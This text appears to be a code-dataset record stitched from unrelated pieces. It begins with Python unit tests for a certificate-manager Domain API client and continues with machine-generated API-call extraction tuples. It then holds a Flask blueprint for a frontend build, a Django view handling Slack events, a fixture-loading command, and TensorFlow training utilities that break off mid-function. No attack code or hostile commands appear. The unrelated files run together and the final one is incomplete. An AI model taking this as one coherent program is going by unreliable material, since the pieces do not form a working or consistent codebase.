domain = Domain(client=self.client)
response = domain.delete(domain_id)
self.assertEqual(True, response)
@responses.activate
def test_delete_failure_http_error(self):
"""
The function should raise an HTTPError exception if the deletion
failed.
"""
domain_id = 1234
api_url = f"{self.api_url}/{str(domain_id)}"
# Setup the mocked response
responses.add(responses.DELETE, api_url, status=404)
domain = Domain(client=self.client)
self.assertRaises(HTTPError, domain.delete, domain_id)
class TestActivate(TestDomain):
"""Test the .activate method."""
@responses.activate
def test_need_params(self):
"""
The function should raise an exception when called without required
parameters.
"""
domain = Domain(client=self.client)
# missing domain_id
self.assertRaises(TypeError, domain.activate)
@responses.activate
def test_activate_success(self):
"""The function should return True if the activation succeeded."""
domain_id = 1234
api_url = f"{self.api_url}/{str(domain_id)}/activate"
# Setup the mocked response
responses.add(responses.PUT, api_url, status=200)
domain = Domain(client=self.client)
response = domain.activate(domain_id)
self.assertEqual(True, response)
@responses.activate
def test_activate_failure_http_error(self):
"""
        The function should raise an HTTPError exception if the activation
        failed.
"""
domain_id = 1234
api_url = f"{self.api_url}/{str(domain_id)}/activate"
# Setup the mocked response
responses.add(responses.PUT, api_url, status=404)
domain = Domain(client=self.client)
self.assertRaises(HTTPError, domain.activate, domain_id)
class TestSuspend(TestDomain):
"""Test the .suspend method."""
@responses.activate
def test_need_params(self):
"""
The function should raise an exception when called without required
parameters.
"""
domain = Domain(client=self.client)
# missing domain_id
self.assertRaises(TypeError, domain.suspend)
@responses.activate
def test_suspend_success(self):
"""The function should return True if the suspension succeeded."""
domain_id = 1234
api_url = f"{self.api_url}/{str(domain_id)}/suspend"
# Setup the mocked response
responses.add(responses.PUT, api_url, status=200)
domain = Domain(client=self.client)
response = domain.suspend(domain_id)
self.assertEqual(True, response)
@responses.activate
def test_suspend_failure_http_error(self):
"""
The function should raise an HTTPError exception if the suspension
failed.
"""
domain_id = 1234
api_url = f"{self.api_url}/{str(domain_id)}/suspend"
# Setup the mocked response
responses.add(responses.PUT, api_url, status=404)
domain = Domain(client=self.client)
self.assertRaises(HTTPError, domain.suspend, domain_id)
class TestDelegate(TestDomain):
"""Test the .delegate method."""
@responses.activate
def test_need_params(self):
"""
The function should raise an exception when called without required
parameters.
"""
domain = Domain(client=self.client)
# missing domain_id
self.assertRaises(TypeError, domain.delegate)
@responses.activate
def test_delegate_success(self):
"""The function should return True if the delegation succeeded."""
domain_id = 1234
org_id = 4321
types = ["SSL"]
api_url = f"{self.api_url}/{str(domain_id)}/delegation"
# Setup the mocked response
responses.add(responses.POST, api_url, status=200)
domain = Domain(client=self.client)
response = domain.delegate(domain_id, org_id, types)
post_data = {
"orgId": org_id,
"certTypes": types
}
self.assertEqual(True, response)
self.assertEqual(responses.calls[0].request.body, json.dumps(post_data).encode("utf8"))
@responses.activate
def test_delegate_failure_http_error(self):
"""The function should raise an HTTPError exception if the delegation failed."""
domain_id = 1234
org_id = 4321
types = ["SSL"]
api_url = f"{self.api_url}/{str(domain_id)}/delegation"
# Setup the mocked response
responses.add(responses.POST, api_url, status=404)
domain = Domain(client=self.client)
self.assertRaises(HTTPError, domain.delegate, domain_id, org_id, types)
class TestRemoveDelegation(TestDomain):
"""Test the .remove_delegation method."""
@responses.activate
def test_need_params(self):
"""
The function should raise an exception when called without required
parameters.
"""
domain = Domain(client=self.client)
# missing domain_id
self.assertRaises(TypeError, domain.remove_delegation)
@responses.activate
def test_remove_delegation_success(self):
"""The function should return True if the delegation removal succeeded."""
domain_id = 1234
org_id = 4321
types = ["SSL"]
api_url = f"{self.api_url}/{str(domain_id)}/delegation"
# Setup the mocked response
responses.add(responses.DELETE, api_url, status=200)
domain = Domain(client=self.client)
response = domain.remove_delegation(domain_id, org_id, types)
post_data = {
"orgId": org_id,
"certTypes": types
}
self.assertEqual(True, response)
self.assertEqual(responses.calls[0].request.body, json.dumps(post_data).encode("utf8"))
@responses.activate
def test_remove_delegation_failure_http_error(self):
"""The function should raise an HTTPError exception if the delegation removal failed."""
domain_id = 1234
org_id = 4321
types = ["SSL"]
api_url = f"{self.api_url}/{str(domain_id)}/delegation"
# Setup the mocked response
responses.add(responses.DELETE, api_url, status=404)
domain = Domain(client=self.client)
self.assertRaises(HTTPError, domain.remove_delegation, domain_id, org_id, types)
class TestApproveDelegation(TestDomain):
"""Test the .approve_delegation method."""
@responses.activate
def test_need_params(self):
"""
The function should raise an exception when called without required
parameters.
"""
domain = Domain(client=self.client)
# missing domain_id
self.assertRaises(TypeError, domain.approve_delegation)
@responses.activate
def test_approve_delegation_success(self):
"""The function should return True if the approval succeeded."""
domain_id = 1234
org_id = 4321
api_url = f"{self.api_url}/{str(domain_id)}/delegation/approve"
# Setup the mocked response
responses.add(responses.POST, api_url, status=200)
domain = Domain(client=self.client)
response = domain.approve_delegation(domain_id, org_id)
post_data = {
"orgId": org_id,
}
self.assertEqual(True, response)
self.assertEqual(responses.calls[0].request.body, json.dumps(post_data).encode("utf8"))
@responses.activate
def test_approval_failure_http_error(self):
"""The function should raise an HTTPError exception if the approval failed."""
domain_id = 1234
org_id = 4321
api_url = f"{self.api_url}/{str(domain_id)}/delegation/approve"
# Setup the mocked response
responses.add(responses.POST, api_url, status=404)
domain = Domain(client=self.client)
self.assertRaises(HTTPError, domain.approve_delegation, domain_id, org_id)
class TestRejectDelegation(TestDomain):
"""Test the .reject_delegation method."""
@responses.activate
def test_need_params(self):
"""
The function should raise an exception when called without required
parameters.
"""
domain = Domain(client=self.client)
# missing domain_id
self.assertRaises(TypeError, domain.reject_delegation)
@responses.activate
def test_reject_delegation_success(self):
"""The function should return True if the rejection succeeded."""
domain_id = 1234
org_id = 4321
api_url = f"{self.api_url}/{str(domain_id)}/delegation/reject"
# Setup the mocked response
responses.add(responses.POST, api_url, status=200)
domain = Domain(client=self.client)
response = domain.reject_delegation(domain_id, org_id)
post_data = {
"orgId": org_id,
}
self.assertEqual(True, response)
self.assertEqual(responses.calls[0].request.body, json.dumps(post_data).encode("utf8"))
@responses.activate
def test_reject_failure_http_error(self):
"""The function should raise an HTTPError exception if the rejection failed."""
domain_id = 1234
org_id = 4321
api_url = f"{self.api_url}/{str(domain_id)}/delegation/reject"
# Setup the mocked response
responses.add(responses.POST, api_url, status=404)
domain = Domain(client=self.client)
self.assertRaises(HTTPError, domain.reject_delegation, domain_id, org_id)
| [
"json.dumps",
"responses.add",
"cert_manager.domain.Domain"
]
| [((1842, 1917), 'responses.add', 'responses.add', (['responses.GET', 'api_url'], {'json': 'self.valid_response', 'status': '(200)'}), '(responses.GET, api_url, json=self.valid_response, status=200)\n', (1855, 1917), False, 'import responses\n'), ((1936, 1983), 'cert_manager.domain.Domain', 'Domain', ([], {'client': 'self.client', 'api_version': 'version'}), '(client=self.client, api_version=version)\n', (1942, 1983), False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((2629, 2714), 'responses.add', 'responses.add', (['responses.GET', 'self.api_url'], {'json': 'self.valid_response', 'status': '(200)'}), '(responses.GET, self.api_url, json=self.valid_response, status=200\n )\n', (2642, 2714), False, 'import responses\n'), ((2728, 2754), 'cert_manager.domain.Domain', 'Domain', ([], {'client': 'self.client'}), '(client=self.client)\n', (2734, 2754), False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((3415, 3500), 'responses.add', 'responses.add', (['responses.GET', 'self.api_url'], {'json': 'self.valid_response', 'status': '(200)'}), '(responses.GET, self.api_url, json=self.valid_response, status=200\n )\n', (3428, 3500), False, 'import responses\n'), ((3514, 3540), 'cert_manager.domain.Domain', 'Domain', ([], {'client': 'self.client'}), '(client=self.client)\n', (3520, 3540), False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((4305, 4390), 'responses.add', 'responses.add', (['responses.GET', 'self.api_url'], {'json': 'self.error_response', 'status': '(400)'}), '(responses.GET, self.api_url, json=self.error_response, status=400\n )\n', (4318, 4390), False, 'import responses\n'), ((4404, 4430), 'cert_manager.domain.Domain', 'Domain', ([], {'client': 'self.client'}), '(client=self.client)\n', (4410, 4430), False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((4876, 4961), 'responses.add', 'responses.add', (['responses.GET', 'self.api_url'], {'json': 'self.valid_response', 'status': '(200)'}), '(responses.GET, self.api_url, json=self.valid_response, status=200\n )\n', (4889, 4961), False, 'import responses\n'), ((4975, 5001), 'cert_manager.domain.Domain', 'Domain', ([], {'client': 'self.client'}), '(client=self.client)\n', (4981, 5001), False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((5227, 5314), 'responses.add', 'responses.add', (['responses.GET', 'self.api_url'], {'json': 'self.valid_response[0]', 'status': '(200)'}), '(responses.GET, self.api_url, json=self.valid_response[0],\n status=200)\n', (5240, 5314), False, 'import responses\n'), ((5382, 5408), 'cert_manager.domain.Domain', 'Domain', ([], {'client': 'self.client'}), '(client=self.client)\n', (5388, 5408), False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((5828, 5913), 'responses.add', 'responses.add', (['responses.GET', 'self.api_url'], {'json': 'self.error_response', 'status': '(400)'}), '(responses.GET, self.api_url, json=self.error_response, status=400\n )\n', (5841, 5913), False, 'import responses\n'), ((5927, 5953), 'cert_manager.domain.Domain', 'Domain', ([], {'client': 'self.client'}), '(client=self.client)\n', (5933, 5953), False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((6495, 6556), 'responses.add', 'responses.add', (['responses.GET', 'api_url'], {'json': 'count', 'status': '(200)'}), '(responses.GET, api_url, json=count, status=200)\n', (6508, 6556), False, 'import responses\n'), ((6575, 6601), 
'cert_manager.domain.Domain', 'Domain', ([], {'client': 'self.client'}), '(client=self.client)\n', (6581, 6601), False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((6977, 7038), 'responses.add', 'responses.add', (['responses.GET', 'api_url'], {'json': 'count', 'status': '(200)'}), '(responses.GET, api_url, json=count, status=200)\n', (6990, 7038), False, 'import responses\n'), ((7057, 7083), 'cert_manager.domain.Domain', 'Domain', ([], {'client': 'self.client'}), '(client=self.client)\n', (7063, 7083), False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((7549, 7624), 'responses.add', 'responses.add', (['responses.GET', 'api_url'], {'json': 'self.error_response', 'status': '(400)'}), '(responses.GET, api_url, json=self.error_response, status=400)\n', (7562, 7624), False, 'import responses\n'), ((7643, 7669), 'cert_manager.domain.Domain', 'Domain', ([], {'client': 'self.client'}), '(client=self.client)\n', (7649, 7669), False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((8105, 8131), 'cert_manager.domain.Domain', 'Domain', ([], {'client': 'self.client'}), '(client=self.client)\n', (8111, 8131), False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((8437, 8527), 'responses.add', 'responses.add', (['responses.GET', 'api_url'], {'json': 'self.valid_individual_response', 'status': '(200)'}), '(responses.GET, api_url, json=self.valid_individual_response,\n status=200)\n', (8450, 8527), False, 'import responses\n'), ((8542, 8568), 'cert_manager.domain.Domain', 'Domain', ([], {'client': 'self.client'}), '(client=self.client)\n', (8548, 8568), False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((9074, 9123), 'responses.add', 'responses.add', (['responses.GET', 'api_url'], {'status': '(404)'}), '(responses.GET, api_url, status=404)\n', (9087, 9123), False, 'import responses\n'), ((9142, 9168), 'cert_manager.domain.Domain', 'Domain', ([], {'client': 'self.client'}), '(client=self.client)\n', (9148, 9168), False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((9491, 9517), 'cert_manager.domain.Domain', 'Domain', ([], {'client': 'self.client'}), '(client=self.client)\n', (9497, 9517), False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((10058, 10149), 'responses.add', 'responses.add', (['responses.POST', 'self.api_url'], {'headers': "{'Location': location}", 'status': '(201)'}), "(responses.POST, self.api_url, headers={'Location': location},\n status=201)\n", (10071, 10149), False, 'import responses\n'), ((10164, 10190), 'cert_manager.domain.Domain', 'Domain', ([], {'client': 'self.client'}), '(client=self.client)\n', (10170, 10190), False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((10936, 11027), 'responses.add', 'responses.add', (['responses.POST', 'self.api_url'], {'headers': "{'Location': location}", 'status': '(201)'}), "(responses.POST, self.api_url, headers={'Location': location},\n status=201)\n", (10949, 11027), False, 'import responses\n'), ((11042, 11068), 'cert_manager.domain.Domain', 'Domain', ([], {'client': 'self.client'}), '(client=self.client)\n', (11048, 11068), False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((11754, 11839), 'responses.add', 'responses.add', (['responses.POST', 'self.api_url'], {'json': 'self.error_response', 'status': '(400)'}), '(responses.POST, self.api_url, json=self.error_response,\n 
status=400)\n', (11767, 11839), False, 'import responses\n'), ((11876, 11902), 'cert_manager.domain.Domain', 'Domain', ([], {'client': 'self.client'}), '(client=self.client)\n', (11882, 11902), False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((12437, 12522), 'responses.add', 'responses.add', (['responses.POST', 'self.api_url'], {'json': 'self.error_response', 'status': '(200)'}), '(responses.POST, self.api_url, json=self.error_response,\n status=200)\n', (12450, 12522), False, 'import responses\n'), ((12559, 12585), 'cert_manager.domain.Domain', 'Domain', ([], {'client': 'self.client'}), '(client=self.client)\n', (12565, 12585), False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((13139, 13194), 'responses.add', 'responses.add', (['responses.POST', 'self.api_url'], {'status': '(201)'}), '(responses.POST, self.api_url, status=201)\n', (13152, 13194), False, 'import responses\n'), ((13213, 13239), 'cert_manager.domain.Domain', 'Domain', ([], {'client': 'self.client'}), '(client=self.client)\n', (13219, 13239), False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((13790, 13884), 'responses.add', 'responses.add', (['responses.POST', 'self.api_url'], {'headers': "{'Location': 'not a url'}", 'status': '(201)'}), "(responses.POST, self.api_url, headers={'Location':\n 'not a url'}, status=201)\n", (13803, 13884), False, 'import responses\n'), ((13899, 13925), 'cert_manager.domain.Domain', 'Domain', ([], {'client': 'self.client'}), '(client=self.client)\n', (13905, 13925), False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((14410, 14436), 'cert_manager.domain.Domain', 'Domain', ([], {'client': 'self.client'}), '(client=self.client)\n', (14416, 14436), False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((14774, 14826), 'responses.add', 'responses.add', (['responses.DELETE', 'api_url'], {'status': '(200)'}), '(responses.DELETE, api_url, status=200)\n', (14787, 14826), False, 'import responses\n'), ((14845, 14871), 'cert_manager.domain.Domain', 'Domain', ([], {'client': 'self.client'}), '(client=self.client)\n', (14851, 14871), False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((15266, 15318), 'responses.add', 'responses.add', (['responses.DELETE', 'api_url'], {'status': '(404)'}), '(responses.DELETE, api_url, status=404)\n', (15279, 15318), False, 'import responses\n'), ((15337, 15363), 'cert_manager.domain.Domain', 'Domain', ([], {'client': 'self.client'}), '(client=self.client)\n', (15343, 15363), False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((15694, 15720), 'cert_manager.domain.Domain', 'Domain', ([], {'client': 'self.client'}), '(client=self.client)\n', (15700, 15720), False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((16073, 16122), 'responses.add', 'responses.add', (['responses.PUT', 'api_url'], {'status': '(200)'}), '(responses.PUT, api_url, status=200)\n', (16086, 16122), False, 'import responses\n'), ((16141, 16167), 'cert_manager.domain.Domain', 'Domain', ([], {'client': 'self.client'}), '(client=self.client)\n', (16147, 16167), False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((16575, 16624), 'responses.add', 'responses.add', (['responses.PUT', 'api_url'], {'status': '(404)'}), '(responses.PUT, api_url, status=404)\n', (16588, 16624), False, 'import responses\n'), ((16643, 16669), 'cert_manager.domain.Domain', 
'Domain', ([], {'client': 'self.client'}), '(client=self.client)\n', (16649, 16669), False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((17000, 17026), 'cert_manager.domain.Domain', 'Domain', ([], {'client': 'self.client'}), '(client=self.client)\n', (17006, 17026), False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((17376, 17425), 'responses.add', 'responses.add', (['responses.PUT', 'api_url'], {'status': '(200)'}), '(responses.PUT, api_url, status=200)\n', (17389, 17425), False, 'import responses\n'), ((17444, 17470), 'cert_manager.domain.Domain', 'Domain', ([], {'client': 'self.client'}), '(client=self.client)\n', (17450, 17470), False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((17877, 17926), 'responses.add', 'responses.add', (['responses.PUT', 'api_url'], {'status': '(404)'}), '(responses.PUT, api_url, status=404)\n', (17890, 17926), False, 'import responses\n'), ((17945, 17971), 'cert_manager.domain.Domain', 'Domain', ([], {'client': 'self.client'}), '(client=self.client)\n', (17951, 17971), False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((18303, 18329), 'cert_manager.domain.Domain', 'Domain', ([], {'client': 'self.client'}), '(client=self.client)\n', (18309, 18329), False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((18730, 18780), 'responses.add', 'responses.add', (['responses.POST', 'api_url'], {'status': '(200)'}), '(responses.POST, api_url, status=200)\n', (18743, 18780), False, 'import responses\n'), ((18799, 18825), 'cert_manager.domain.Domain', 'Domain', ([], {'client': 'self.client'}), '(client=self.client)\n', (18805, 18825), False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((19460, 19510), 'responses.add', 'responses.add', (['responses.POST', 'api_url'], {'status': '(404)'}), '(responses.POST, api_url, status=404)\n', (19473, 19510), False, 'import responses\n'), ((19529, 19555), 'cert_manager.domain.Domain', 'Domain', ([], {'client': 'self.client'}), '(client=self.client)\n', (19535, 19555), False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((19920, 19946), 'cert_manager.domain.Domain', 'Domain', ([], {'client': 'self.client'}), '(client=self.client)\n', (19926, 19946), False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((20373, 20425), 'responses.add', 'responses.add', (['responses.DELETE', 'api_url'], {'status': '(200)'}), '(responses.DELETE, api_url, status=200)\n', (20386, 20425), False, 'import responses\n'), ((20444, 20470), 'cert_manager.domain.Domain', 'Domain', ([], {'client': 'self.client'}), '(client=self.client)\n', (20450, 20470), False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((21131, 21183), 'responses.add', 'responses.add', (['responses.DELETE', 'api_url'], {'status': '(404)'}), '(responses.DELETE, api_url, status=404)\n', (21144, 21183), False, 'import responses\n'), ((21202, 21228), 'cert_manager.domain.Domain', 'Domain', ([], {'client': 'self.client'}), '(client=self.client)\n', (21208, 21228), False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((21604, 21630), 'cert_manager.domain.Domain', 'Domain', ([], {'client': 'self.client'}), '(client=self.client)\n', (21610, 21630), False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((22033, 22083), 'responses.add', 'responses.add', (['responses.POST', 'api_url'], 
{'status': '(200)'}), '(responses.POST, api_url, status=200)\n', (22046, 22083), False, 'import responses\n'), ((22102, 22128), 'cert_manager.domain.Domain', 'Domain', ([], {'client': 'self.client'}), '(client=self.client)\n', (22108, 22128), False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((22717, 22767), 'responses.add', 'responses.add', (['responses.POST', 'api_url'], {'status': '(404)'}), '(responses.POST, api_url, status=404)\n', (22730, 22767), False, 'import responses\n'), ((22786, 22812), 'cert_manager.domain.Domain', 'Domain', ([], {'client': 'self.client'}), '(client=self.client)\n', (22792, 22812), False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((23180, 23206), 'cert_manager.domain.Domain', 'Domain', ([], {'client': 'self.client'}), '(client=self.client)\n', (23186, 23206), False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((23607, 23657), 'responses.add', 'responses.add', (['responses.POST', 'api_url'], {'status': '(200)'}), '(responses.POST, api_url, status=200)\n', (23620, 23657), False, 'import responses\n'), ((23676, 23702), 'cert_manager.domain.Domain', 'Domain', ([], {'client': 'self.client'}), '(client=self.client)\n', (23682, 23702), False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((24288, 24338), 'responses.add', 'responses.add', (['responses.POST', 'api_url'], {'status': '(404)'}), '(responses.POST, api_url, status=404)\n', (24301, 24338), False, 'import responses\n'), ((24357, 24383), 'cert_manager.domain.Domain', 'Domain', ([], {'client': 'self.client'}), '(client=self.client)\n', (24363, 24383), False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((10511, 10532), 'json.dumps', 'json.dumps', (['post_data'], {}), '(post_data)\n', (10521, 10532), False, 'import json\n'), ((11472, 11493), 'json.dumps', 'json.dumps', (['post_data'], {}), '(post_data)\n', (11482, 11493), False, 'import json\n'), ((19079, 19100), 'json.dumps', 'json.dumps', (['post_data'], {}), '(post_data)\n', (19089, 19100), False, 'import json\n'), ((20733, 20754), 'json.dumps', 'json.dumps', (['post_data'], {}), '(post_data)\n', (20743, 20754), False, 'import json\n'), ((22354, 22375), 'json.dumps', 'json.dumps', (['post_data'], {}), '(post_data)\n', (22364, 22375), False, 'import json\n'), ((23927, 23948), 'json.dumps', 'json.dumps', (['post_data'], {}), '(post_data)\n', (23937, 23948), False, 'import json\n')] |
from flask import Blueprint, Flask, send_from_directory
from werkzeug.security import check_password_hash, generate_password_hash
from app import db
from app.mod_auth.forms import LoginForm
from app.mod_auth.models import User
mod_ecomm = Blueprint('products', __name__, url_prefix='/products',
static_folder='../../frontend/build')
@mod_ecomm.route("/", defaults={'path': ''})
@mod_ecomm.route("/<path:path>")
def serve(path):
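    # Serve files from the compiled frontend build: a concrete path is served
    # as a static asset, while the bare route returns index.html.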
if path:
return send_from_directory(mod_ecomm.static_folder, path)
else:
return send_from_directory(mod_ecomm.static_folder, 'index.html')
| [
"flask.Blueprint",
"flask.send_from_directory"
]
| [((248, 346), 'flask.Blueprint', 'Blueprint', (['"""products"""', '__name__'], {'url_prefix': '"""/products"""', 'static_folder': '"""../../frontend/build"""'}), "('products', __name__, url_prefix='/products', static_folder=\n '../../frontend/build')\n", (257, 346), False, 'from flask import Blueprint, Flask, send_from_directory\n'), ((463, 513), 'flask.send_from_directory', 'send_from_directory', (['mod_ecomm.static_folder', 'path'], {}), '(mod_ecomm.static_folder, path)\n', (482, 513), False, 'from flask import Blueprint, Flask, send_from_directory\n'), ((541, 599), 'flask.send_from_directory', 'send_from_directory', (['mod_ecomm.static_folder', '"""index.html"""'], {}), "(mod_ecomm.static_folder, 'index.html')\n", (560, 599), False, 'from flask import Blueprint, Flask, send_from_directory\n')] |
import pprint
import logging
from django.conf import settings
from rest_framework import status
from rest_framework.views import APIView
from rest_framework.response import Response
from zenslackchat.message import handler
from zenslackchat.models import SlackApp
from zenslackchat.models import ZendeskApp
class Events(APIView):
"""Handle Events using the webapp instead of using the RTM API.
    This is handy as I don't need to run a specific bot process just to handle
    events. Instead I can just use the webapp REST API for this.
Handy documentation for Slack events: https://api.slack.com/events-api
The app needs to subscribe to events to receive them. From
https://api.slack.com/apps/<APP ID>/event-subscriptions you need to:
- Enable Events from "Off" to "On"
- Enter the "Request URL" e.g.: http://<instance id>.ngrok.io/slack/events/
- Then "Subscribe to events on behalf of users"
- Click "Add Workspace Event" and add "message.channels".
    Messages on channels will now start being received. The bot will need to be
invited to a channel first.
"""
def post(self, request, *args, **kwargs):
"""Events will come in over a POST request.
"""
log = logging.getLogger(__name__)
slack_message = request.data
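        # Reject any request that does not carry Slack's verification token.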
if slack_message.get('token') != settings.SLACK_VERIFICATION_TOKEN:
log.error("Slack message verification failed!")
return Response(status=status.HTTP_403_FORBIDDEN)
# verification challenge, convert to signature verification instead:
if slack_message.get('type') == 'url_verification':
return Response(data=slack_message, status=status.HTTP_200_OK)
if 'event' in slack_message:
event = slack_message.get('event')
if settings.DEBUG:
log.debug(f'event received:\n{pprint.pformat(event)}\n')
try:
handler(
event,
our_channel=settings.SRE_SUPPORT_CHANNEL,
slack_client=SlackApp.client(),
zendesk_client=ZendeskApp.client(),
workspace_uri=settings.SLACK_WORKSPACE_URI,
zendesk_uri=settings.ZENDESK_TICKET_URI,
user_id=settings.ZENDESK_USER_ID,
group_id=settings.ZENDESK_GROUP_ID,
)
except: # noqa
                # I want all events even if they cause me problems. If I don't
                # accept, the webhook will be marked as broken and then no more
# events will be sent.
log.exception("Slack message_handler error: ")
return Response(status=status.HTTP_200_OK)
| [
"logging.getLogger",
"pprint.pformat",
"zenslackchat.models.ZendeskApp.client",
"zenslackchat.models.SlackApp.client",
"rest_framework.response.Response"
]
| [((1240, 1267), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (1257, 1267), False, 'import logging\n'), ((2703, 2738), 'rest_framework.response.Response', 'Response', ([], {'status': 'status.HTTP_200_OK'}), '(status=status.HTTP_200_OK)\n', (2711, 2738), False, 'from rest_framework.response import Response\n'), ((1462, 1504), 'rest_framework.response.Response', 'Response', ([], {'status': 'status.HTTP_403_FORBIDDEN'}), '(status=status.HTTP_403_FORBIDDEN)\n', (1470, 1504), False, 'from rest_framework.response import Response\n'), ((1662, 1717), 'rest_framework.response.Response', 'Response', ([], {'data': 'slack_message', 'status': 'status.HTTP_200_OK'}), '(data=slack_message, status=status.HTTP_200_OK)\n', (1670, 1717), False, 'from rest_framework.response import Response\n'), ((2071, 2088), 'zenslackchat.models.SlackApp.client', 'SlackApp.client', ([], {}), '()\n', (2086, 2088), False, 'from zenslackchat.models import SlackApp\n'), ((2125, 2144), 'zenslackchat.models.ZendeskApp.client', 'ZendeskApp.client', ([], {}), '()\n', (2142, 2144), False, 'from zenslackchat.models import ZendeskApp\n'), ((1880, 1901), 'pprint.pformat', 'pprint.pformat', (['event'], {}), '(event)\n', (1894, 1901), False, 'import pprint\n')] |
from django.conf import settings
from django.core.management import call_command
from django.core.management.base import BaseCommand
from os import path
class Command(BaseCommand):
help = "Populates data"
def handle(self, *args, **options):
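        # The fixtures/ directory lives three levels above this file, i.e. in
        # the app directory for a standard management/commands layout.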
        fixture_path = path.join(
            path.dirname(path.dirname(path.dirname(path.abspath(__file__)))),
            "fixtures/")
settings.FIXTURE_DIRS = (fixture_path,)
call_command("loaddata", "country", verbosity=1)
| [
"os.path.abspath",
"django.core.management.call_command"
]
| [((510, 558), 'django.core.management.call_command', 'call_command', (['"""loaddata"""', '"""country"""'], {'verbosity': '(1)'}), "('loaddata', 'country', verbosity=1)\n", (522, 558), False, 'from django.core.management import call_command\n'), ((375, 397), 'os.path.abspath', 'path.abspath', (['__file__'], {}), '(__file__)\n', (387, 397), False, 'from os import path\n')] |
import tensorflow as tf
@tf.function
def BinaryAccuracy_Infiltrates(y_true, y_pred, i=0):
return tf.keras.metrics.binary_accuracy(y_true[:, i], y_pred[:, i])
@tf.function
def BinaryAccuracy_Pneumonia(y_true, y_pred, i=1):
return tf.keras.metrics.binary_accuracy(y_true[:, i], y_pred[:, i])
@tf.function
def BinaryAccuracy_Covid19(y_true, y_pred, i=2):
return tf.keras.metrics.binary_accuracy(y_true[:, i], y_pred[:, i])
@tf.function
def BinaryAccuracy_Normal(y_true, y_pred, i=3):
return tf.keras.metrics.binary_accuracy(y_true[:, i], y_pred[:, i])
class CustomModelCheckpoint(tf.keras.callbacks.ModelCheckpoint):
def __init__(self, *args, **kwargs):
        # Pop the custom kwarg before handing the rest to ModelCheckpoint,
        # which may reject keyword arguments it does not recognize.
        self.wait_epoch_warmup = kwargs.pop("wait_epoch_warmup", None)
        super().__init__(*args, **kwargs)
def on_epoch_end(self, epoch, logs=None):
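        # Only start saving checkpoints once the warm-up period has elapsed;
        # until then just keep the save counter ticking.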
if self.wait_epoch_warmup:
if (epoch + 1) >= self.wait_epoch_warmup:
super().on_epoch_end(epoch, logs)
else:
self.epochs_since_last_save += 1
print(f"Skipping save model (wait_epoch_warmup={self.wait_epoch_warmup - (epoch + 1)})")
else:
super().on_epoch_end(epoch, logs)
class CustomEarlyStopping(tf.keras.callbacks.EarlyStopping):
def __init__(self, *args, **kwargs):
self.minimum_epochs = kwargs.get("minimum_epochs", 0)
kwargs.pop('minimum_epochs', None) # Problems with EarlyStopping kwargs
super().__init__(*args, **kwargs)
def on_epoch_end(self, epoch, logs=None):
if epoch >= self.minimum_epochs:
super().on_epoch_end(epoch, logs)
def get_losses():
losses = [tf.keras.losses.BinaryCrossentropy()]
return losses
def get_metrics(single_output_idx, add_normal=False):
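    # Multi-label mode (single_output_idx is None) tracks a binary accuracy per
    # class; single-output mode uses binary accuracy, AUC, precision and recall.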
metrics = []
if single_output_idx is None: # Multi-label
print("###### Multi-label classification ######")
metrics += [
BinaryAccuracy_Infiltrates,
BinaryAccuracy_Pneumonia,
BinaryAccuracy_Covid19
]
# Add normal class
if add_normal:
metrics.append(BinaryAccuracy_Normal)
else:
print(f"###### Multi-class classification (cls: '{single_output_idx}') ######")
metrics = [
tf.keras.metrics.BinaryAccuracy(),
tf.keras.metrics.AUC(),
tf.keras.metrics.Precision(),
tf.keras.metrics.Recall()
]
return metrics
def get_model(backbone, classes=None, target_size=None, freeze_base_model=True, ignore_model=None):
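    # Builds a transfer-learning classifier: an ImageNet-pretrained backbone,
    # global average pooling and a sigmoid head with `classes` outputs. When
    # ignore_model is set, the model is skipped and (None, preprocess_input)
    # is returned.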
istrainable = not freeze_base_model
# Select backbone
if backbone == "resnet50":
from tensorflow.keras.applications.resnet import ResNet50 as TFModel
from tensorflow.keras.applications.resnet import preprocess_input
elif backbone == "resnet50v2":
from tensorflow.keras.applications.resnet_v2 import ResNet50V2 as TFModel
from tensorflow.keras.applications.resnet_v2 import preprocess_input
elif backbone == "resnet101v2":
